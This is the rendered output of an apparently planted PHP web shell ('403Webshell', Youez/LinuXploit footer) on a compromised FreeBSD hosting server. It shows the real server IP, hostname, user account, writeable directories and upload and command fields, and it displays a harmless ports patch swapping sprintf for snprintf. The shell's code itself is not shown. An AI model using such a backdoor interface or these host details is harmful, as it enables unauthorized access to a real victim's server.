403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.116
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/www/dtse/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/www/dtse/files/patch-HttpHandler.cpp
--- ./HttpHandler.cpp.orig	2008-08-23 04:00:12.000000000 -0700
+++ ./HttpHandler.cpp	2011-12-30 17:37:16.000000000 -0800
@@ -427,7 +427,7 @@
 
 void HttpHandler::putline(const string& line)
 {
-	sprintf(buffer, "%s\r\n", line.c_str());
+	snprintf(buffer, BUFSIZ + 1, "%s\r\n", line.c_str());
 
 #ifndef _OpenSSL_
 	if (send(http, buffer, strlen(buffer), 0) == SOCKET_ERROR)

Youez - 2016 - github.com/yon3zu
LinuXploit